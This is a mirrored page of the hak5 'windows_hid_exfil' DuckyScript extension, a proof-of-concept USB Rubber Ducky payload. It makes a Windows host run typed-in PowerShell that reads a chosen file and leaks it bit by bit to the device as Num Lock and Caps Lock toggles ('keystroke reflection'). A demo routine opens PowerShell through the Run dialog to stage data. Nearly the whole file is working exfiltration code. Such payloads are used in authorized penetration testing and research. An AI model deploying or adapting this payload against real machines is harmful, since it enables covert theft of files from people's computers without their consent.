Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/extensions/windows_hid_exfil.txt
2968 views
1
EXTENSION WINDOWS_HID_EXFIL

2
    REM VERSION 1.1

3
    REM AUTHOR: Korben

4


5
    REM_BLOCK DOCUMENTATION

6
        Helpers for Keystroke Reflection data exfiltration

7
        This payload is a proof of concept for USB HID only Data Exfiltration

8


9
        TARGET:

10
            Windows Host that supports powershell and SendKeys

11


12
        USAGE:

13
            Prepare data to exfil (in filename defined by TARGET_FILE below)

14
            with a powershell window already open - call RUN_WINDOWS_EXFIL()

15


16
        DEPLOYMENT:

17
            Plug Ducky into host, wait for the LED to turn (and stay) solid green.

18
    END_REM

19


20
    REM CONFIGURATION:

21
    REM File on host machine to exfil

22
    DEFINE #TARGET_FILE filename.txt

23


24
    DEFINE #SAVE_AND_RESTORE_LOCKS TRUE

25
    DEFINE #ENABLE_EXFIL_LEDS TRUE

26
    DEFINE #CLOSE_AFTER_EXFIL TRUE

27


28
    DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE

29


30
    FUNCTION RUN_WINDOWS_EXFIL()

31
        IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS

32
            SAVE_HOST_KEYBOARD_LOCK_STATE

33
        END_IF_DEFINED

34


35
        IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS

36
            LED_OFF

37
            $_EXFIL_LEDS_ENABLED = TRUE

38
        END_IF_DEFINED

39


40
        $_EXFIL_MODE_ENABLED = TRUE

41
        STRING_POWERSHELL

42
            foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){

43
                foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){

44
                    If($b -band $a){

45
                        $o+="%{NUMLOCK}"

46
                    }Else{

47
                        $o+="%{CAPSLOCK}"

48
                    }

49
                }

50
            };

51
            $o+="%{SCROLLLOCK}";

52
            Add-Type -Assembly System.Windows.Forms;

53
            [System.Windows.Forms.SendKeys]::SendWait("$o");

54
        END_STRING

55
        IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL

56
            STRING exit;

57
        END_IF_DEFINED

58


59
        ENTER

60


61
        REM Listen for EOF

62
        WAIT_FOR_SCROLL_CHANGE

63
        $_EXFIL_MODE_ENABLED = FALSE

64


65
        IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS

66
            LED_G

67
        END_IF_DEFINED

68


69
        IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS

70
            RESTORE_HOST_KEYBOARD_LOCK_STATE

71
        END_IF_DEFINED

72
    END_FUNCTION

73


74
    IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO

75
        REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.

76
        REM DEMO Boot Delay

77
        DELAY 3000

78
        REM Open run dialog

79
        GUI r

80
        DELAY 500

81
        REM Open Powershell

82
        STRINGLN powershell

83
        DELAY 500

84
        REM Prepare some data in TARGET_FILE

85
        STRINGLN echo test123 > #TARGET_FILE

86
        DELAY 500

87
        REM Exfil data to USB Rubber Ducky using Keystroke Reflection

88
        RUN_WINDOWS_EXFIL()

89
    END_IF_DEFINED

90
END_EXTENSION

91


92